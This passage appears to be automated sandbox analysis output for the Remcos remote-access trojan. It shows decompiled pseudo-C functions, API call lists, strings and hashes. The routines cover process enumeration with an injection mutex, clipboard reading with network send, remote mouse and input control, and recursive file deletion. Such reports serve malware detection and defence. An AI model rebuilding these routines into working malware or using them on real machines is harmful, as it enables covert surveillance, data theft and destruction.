						L00401EDA( &_v32, _v676, _t159, L00416FD0( &_v120, _v676));
						L00401ED0();
						if(E00407746( &_v1204) == 0) {
							_t149 =  &E0045F714;
							if(E00407746( &E0045F714) != 0 || L00416F9A(_v676) != 0) {
								L00401ED0();
								L13:
								L00401ED0();
								goto L14;
							} else {
								L00409E58( &_v32);
								L00401ED0();
								break;
							}
						}
						L00401ED0();
						L00401ED0();
						goto L22;
					}
					L00401ED0();
				}
				CloseHandle(_v8);
				_t149 =  &E0045F714;
				if(E00407746( &E0045F714) != 0) {
					goto L13;
				}
				L00401ED0();
				goto L18;
			}

0x0040d1c5
0x0040d1c8
0x0040d1ce
0x0040d1dd
0x0040d33e
0x0040d34a
0x0040d34f
0x0040d352
0x0040d35e
0x0040d360
0x0040d371
0x0040d37e
0x0040d37e
0x0040d371
0x0040d393
0x0040d40d
0x0040d410
0x0040d41d
0x0040d395
0x0040d395
0x0040d3a6
0x0040d3a8
0x0040d3bc
0x0040d3c4
0x0040d3de
0x0040d3ff
0x0040d3e0
0x0040d3e7
0x0040d3f5
0x0040d3fb
0x0040d408
0x00000000
0x0040d408
0x0040d393
0x0040d1e6
0x0040d1ee
0x0040d1fa
0x0040d1ff
0x0040d209
0x0040d270
0x0040d21b
0x0040d22c
0x0040d23a
0x0040d251
0x0040d256
0x0040d266
0x0040d2c1
0x0040d2c9
0x0040d2de
0x0040d2f5
0x0040d304
0x0040d331
0x0040d339
0x0040d339
0x00000000
0x0040d315
0x0040d31c
0x0040d324
0x00000000
0x0040d324
0x0040d304
0x0040d2e3
0x0040d2eb
0x00000000
0x0040d2eb
0x0040d26b
0x0040d26b
0x0040d287
0x0040d28d
0x0040d29f
0x00000000
0x00000000
0x0040d2a5
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046C578,00000000,00000001), ref: 0040D1C8
CreateToolhelp32Snapshot.KERNEL32 ref: 0040D1EE
Process32FirstW.KERNEL32 ref: 0040D209
Process32NextW.KERNEL32 ref: 0040D27A
CloseHandle.KERNEL32(0040CC11,?,00000000,?,?,?), ref: 0040D287
CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D39D
CloseHandle.KERNEL32(00000000), ref: 0040D3FF

Part of subcall function 00416FD0: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00416FE5

Strings

Program Files\, xrefs: 0040D361
Program Files (x86)\, xrefs: 0040D373
Remcos_Mutex_Inj, xrefs: 0040D395
Inj, xrefs: 0040D3E9

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
API String ID: 193334293-694575909
Opcode ID: 14dc47befd38da8cbe4498f7ed39c5b576ee61f9b3ee111cda567857970f9f21
Instruction ID: 478cdb67a5d67a03f70ae787e2c2ba94b2730d13673da361e8ab10cc645f79f9
Opcode Fuzzy Hash: 14dc47befd38da8cbe4498f7ed39c5b576ee61f9b3ee111cda567857970f9f21
Instruction Fuzzy Hash: 51613F30900209AACF14EFA1D9969EE7735AF10349F50417EB816771E2EF386E4ECA59

Uniqueness

Uniqueness Score: -1.00%

Function 004126A5, Relevance: 18.1, APIs: 12, Instructions: 83
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004126A5(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				int _t10;
				void* _t20;
				void* _t22;
				void* _t31;
				struct HWND__* _t38;
				void* _t57;
				void* _t61;
				void* _t64;
				void* _t66;

				_t55 = __edx;
				_t10 = OpenClipboard(_t38);
				_t68 = _t10;
				if(_t10 != 0) {
					EmptyClipboard();
					L00401E29( &_a16, _t55, _t68, _t38);
					_t57 = GlobalAlloc(0x2000, E00402469() + 2);
					_t20 = GlobalLock(_t57);
					L00401E29( &_a12, _t55, _t68, _t38);
					_t22 = E00402469();
					L00431DF0(_t20, L00401F75(L00401E29( &_a8, _t55, _t68, _t38)), _t22);
					_t66 = _t64 + 0xc;
					GlobalUnlock(_t57);
					SetClipboardData(0xd, _t57);
					CloseClipboard();
					if(OpenClipboard(_t38) != 0) {
						_t61 = GetClipboardData(0xd);
						_t31 = GlobalLock(_t61);
						GlobalUnlock(_t61);
						CloseClipboard();
						_t50 =  !=  ? _t31 :  &E0045F714;
						E0040425F(_t38,  &_a36,  !=  ? _t31 :  &E0045F714);
						_t55 =  &_a32;
						L00416CF4(_t38, _t66 - 0x18,  &_a32);
						_push(0x6b);
						E00404A6E(_t38, 0x46c768,  &_a32, _t31);
						L00401ED0();
					}
				}
				L00401E54( &_a16, _t55);
				L00401FA7();
				L00401FA7();
				return 0;
			}

0x004126a5
0x004126a6
0x004126ac
0x004126ae
0x004126b4
0x004126bf
0x004126da
0x004126dd
0x004126ea
0x004126f1
0x0041270a
0x0041270f
0x00412713
0x0041271c
0x00412739
0x00412748
0x00412756
0x00412759
0x00412762
0x00412768
0x00412775
0x0041277d
0x00412785
0x0041278b
0x00412790
0x00412797
0x00412b2a
0x00412b2a
0x00412748
0x00412d65
0x00412d71
0x00412d7d
0x00412d8a

APIs

OpenClipboard.USER32 ref: 004126A6
EmptyClipboard.USER32 ref: 004126B4
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004126D4
GlobalLock.KERNEL32 ref: 004126DD
GlobalUnlock.KERNEL32(00000000), ref: 00412713
SetClipboardData.USER32(0000000D,00000000), ref: 0041271C
CloseClipboard.USER32 ref: 00412739
OpenClipboard.USER32 ref: 00412740
GetClipboardData.USER32 ref: 00412750
GlobalLock.KERNEL32 ref: 00412759
GlobalUnlock.KERNEL32(00000000), ref: 00412762
CloseClipboard.USER32 ref: 00412768

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: c53ac1eb214f147c479415ff99e6888fc5e984e51bb823283e7179944ae20ac7
Instruction ID: 760fdb740c6fae1fa457759c4ec7e7655d91424e05930c477d6cb01e2b71feaa
Opcode Fuzzy Hash: c53ac1eb214f147c479415ff99e6888fc5e984e51bb823283e7179944ae20ac7
Instruction Fuzzy Hash: 5D2151716043009BC214BF71ED5A9BF7769AB90746F04443EF806D21E2EF78CA09866A

Uniqueness

Uniqueness Score: -1.00%

Function 00414923, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00414923(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				char* _t79;
				char* _t80;
				char* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr _t90;
				signed int _t101;
				signed int _t109;
				signed int _t118;
				signed int _t136;

				_t136 = __edx;
				_t90 =  *((intOrPtr*)(E004051EA(0)));
				E00404286( &_a8,  &_v32, 1, 0xffffffff);
				if(_t90 != 0x30) {
					__eflags = _t90 - 0x31;
					if(_t90 != 0x31) {
						__eflags = _t90 - 0x32;
						if(_t90 != 0x32) {
							__eflags = _t90 - 0x33;
							if(_t90 != 0x33) {
								__eflags = _t90 - 0x34;
								if(_t90 != 0x34) {
									__eflags = _t90 - 0x35;
									if(_t90 != 0x35) {
										__eflags = _t90 - 0x36;
										if(_t90 == 0x36) {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E004051EA(0)));
									_t60 = E004051EA(4);
									_t101 =  *0x46bd74; // 0x0
									_v40 =  *_t60;
									E004147BD( *((intOrPtr*)(0x46bd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
									L00414BEF(_v44, _v40);
								}
							} else {
								_t65 = E004051EA(0);
								_v44 =  *((intOrPtr*)(E004051EA(4)));
								_t67 = E004051EA(8);
								_t109 =  *0x46bd74; // 0x0
								_v44 =  *_t67;
								E004147BD( *((intOrPtr*)(0x46bd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
								L00414B93( *_t65, _v48, _v44);
								goto L8;
							}
						} else {
							_t72 = E004051EA(0);
							_v40 =  *((intOrPtr*)(E004051EA(4)));
							_t74 = E004051EA(8);
							_t118 =  *0x46bd74; // 0x0
							_v48 =  *_t74;
							E004147BD( *((intOrPtr*)(0x46bd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
							L00414B37( *_t72, _v44, _v48);
							goto L8;
						}
					} else {
						_t79 = E004051EA(4);
						_t80 = E004051EA(3);
						_t81 = E004051EA(2);
						_t82 = E004051EA(0);
						 *_t79 =  *_t80;
						__eflags =  *_t81;
						L00414C27( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
						goto L8;
					}
				} else {
					E004051EA(0);
					_t85 = E004051EA(1);
					L00413F3B( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E004051EA(2)));
					L8:
				}
				L00401FA7();
				return L00401FA7();
			}

0x00414923
0x00414941
0x00414948
0x00414950
0x0041498f
0x00414992
0x004149ee
0x004149f1
0x00414a4e
0x00414a51
0x00414aaf
0x00414ab2
0x00414b00
0x00414b03
0x00414b0a
0x00414b0d
0x00414b0f
0x00414b10
0x00000000
0x00414b10
0x00414b05
0x00414b05
0x00414b06
0x00414b12
0x00414b19
0x00414b19
0x00414ab4
0x00414ac6
0x00414aca
0x00414acf
0x00414ae2
0x00414aeb
0x00414af9
0x00414af9
0x00414a53
0x00414a58
0x00414a6e
0x00414a76
0x00414a7b
0x00414a8e
0x00414a97
0x00414aa7
0x00000000
0x00414aa7
0x004149f3
0x004149f8
0x00414a0e
0x00414a16
0x00414a1b
0x00414a2e
0x00414a37
0x00414a47
0x00000000
0x00414a47
0x00414994
0x0041499a
0x004149a7
0x004149b4
0x004149c1
0x004149cc
0x004149d6
0x004149e3
0x00000000
0x004149e8
0x00414952
0x00414957
0x00414964
0x00414985
0x00414aac
0x00414aac
0x00414b23
0x00414b36

APIs

StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00414977
mouse_event.USER32 ref: 00414B19

Part of subcall function 004147BD: GetSystemMetrics.USER32 ref: 004147F2
Part of subcall function 004147BD: GetSystemMetrics.USER32 ref: 00414807

Part of subcall function 00414BEF: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 00414C1B

Strings

0, xrefs: 0041494D
1, xrefs: 0041498F
5, xrefs: 00414B00
4, xrefs: 00414AAF
2, xrefs: 004149EE
6, xrefs: 00414B0A
3, xrefs: 00414A4E

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: MetricsSystem$InputSendmouse_event
String ID: 0$1$2$3$4$5$6
API String ID: 1731092567-2737206560
Opcode ID: 79c61de3f94265102c23adb3f3648277b3d6785c0641fac9ee47e3cd7b4c6eff
Instruction ID: 68c723f4934a31661bb6c48b0de6a348d1b664bcb13febd58c7bbbb5345cd8c0
Opcode Fuzzy Hash: 79c61de3f94265102c23adb3f3648277b3d6785c0641fac9ee47e3cd7b4c6eff
Instruction Fuzzy Hash: CA518D70A083019FD704EF21D865F9B77A8EF95314F00492EF5525B2D1DF38AA49CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004170AC, Relevance: 13.6, APIs: 9, Instructions: 147
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004170AC(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x465908; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E00417036( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E004170AC( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}

0x004170c0
0x004170c3
0x004170c5
0x004170c7
0x004170c7
0x004170ca
0x004170ce
0x004170d1
0x004170dc
0x004170e1
0x004170e1
0x004170e5
0x004170e8
0x004170ed
0x004170f8
0x004170fa
0x004170fc
0x00417102
0x00417106
0x00417108
0x00417108
0x0041710b
0x0041710f
0x00417112
0x0041711d
0x00417122
0x00417122
0x00417126
0x00417129
0x0041712e
0x00417133
0x00417149
0x0041714e
0x00417296
0x00000000
0x00417296
0x00417154
0x00417156
0x00417156
0x0041715e
0x00417161
0x00417169
0x0041716e
0x00417172
0x00417182
0x00417286
0x0041728f
0x00417290
0x00000000
0x00417290
0x00417288
0x0041728a
0x00000000
0x0041728a
0x00417195
0x00417216
0x00417216
0x00000000
0x00417216
0x00417197
0x0041719f
0x004171a1
0x004171a1
0x004171a4
0x004171a7
0x004171b2
0x004171b4
0x004171b7
0x004171b7
0x004171bb
0x004171be
0x004171c5
0x004171c8
0x004171d6
0x004171d6
0x004171d8
0x0041723a
0x00417248
0x00417248
0x0041725d
0x00000000
0x0041725f
0x00417261
0x00417263
0x00417263
0x0041726b
0x0041726e
0x00417276
0x00000000
0x0041727b
0x0041725d
0x004171e7
0x00000000
0x00000000
0x004171f4
0x004171fc
0x004171fe
0x004171fe
0x00417206
0x00417209
0x00417211
0x00000000
0x00417219
0x00417219
0x00417222
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 00417143
FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 0041717A
RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 004171F4
FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417222
RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 0041722B
SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 00417248
DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 00417255
GetLastError.KERNEL32(?,0046C518,00000001), ref: 0041727D
FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417290

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 30c9a0a95aa4bf78734a47c826458d57c62751b5d512a52d8cc2ce76a63b2d45
Instruction ID: f55fdd06e51736921a03e431044bfc406960ad07d078f96de4dc955a1c0aff70
Opcode Fuzzy Hash: 30c9a0a95aa4bf78734a47c826458d57c62751b5d512a52d8cc2ce76a63b2d45
Instruction Fuzzy Hash: 4C5105345042198ACF24DF68CC84AFAB7B5BF58305F5045EAE84993251EB359ECBCB98

Uniqueness

Uniqueness Score: -1.00%

Function 0044190C, Relevance: 10.9, APIs: 7, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0044190C(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E0044154B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E004415A9( &_v8) != 0 || E00441551( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043629A();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E0044154B();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E004415A9( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0043629A();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x46a00c; // 0x44c884ad
						_v100 = _t74 ^ _t192;
						 *0x46a344 =  *0x46a344 | 0xffffffff;
						 *0x46a338 =  *0x46a338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x46b748 = 0;
						_t78 = E004391A5(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E0043E61D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E004391A5(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										L0043EE85(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									L0043EE85();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E0044190C(_t139, _t172, _t183, __eflags);
							}
						}
						L0043EE85(_t183);
						__eflags = _v16 ^ _t192;
						return E0042F61B(_v16 ^ _t192);
					} else {
						_t89 = E00441551( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E0044157D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								L0043EE85( *0x46b740);
								 *0x46b740 = 0;
								 *_t194 = 0x46b750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x46b750 * 0x3c;
									_t167 =  *0x46b7a4; // 0x0
									_push(_t171);
									 *0x46b748 = 1;
									_v12 = _t150;
									__eflags =  *0x46b796; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x46b7ea; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x46b7f8; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E0043E1EC(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x46b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x46b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E00441545()) = _v12;
								 *((intOrPtr*)(E00441539())) = _v16;
								_t96 = E0044153F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x46b740; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						L0043EE85(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x441cfd
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x441cfe
						 *0x46b740 = E0043E61D(_t154 - _t169, _t13);
						_t116 = L0043EE85(0);
						_t170 =  *0x46b740; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x441cfd
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x441cfe
							_t119 = E004405A6(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E0044C479(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E00436079(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E00436079(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E00436079(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E00441545()) = _v8;
										_t128 = E00441539();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E0044C479(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}

0x0044190c
0x0044190c
0x00441916
0x0044191b
0x0044191f
0x00441921
0x00441929
0x00441934
0x00441ad4
0x00441ad6
0x00441ad7
0x00441ad8
0x00441ad9
0x00441ada
0x00441adb
0x00441ae0
0x00441ae4
0x00441ae6
0x00441ae9
0x00441af0
0x00441af7
0x00441afb
0x00441afe
0x00441b01
0x00441b06
0x00441b07
0x00441b09
0x00441c31
0x00441c31
0x00441c32
0x00441c33
0x00441c34
0x00441c35
0x00441c36
0x00441c3b
0x00441c3e
0x00441c3f
0x00441c47
0x00441c4e
0x00441c51
0x00441c5e
0x00441c65
0x00441c66
0x00441c67
0x00441c68
0x00441c6d
0x00441c7c
0x00441c83
0x00441c8b
0x00441c8d
0x00441c97
0x00441c9a
0x00441ca7
0x00441caa
0x00441cac
0x00441cc5
0x00441ccd
0x00441ccf
0x00441cd5
0x00441cda
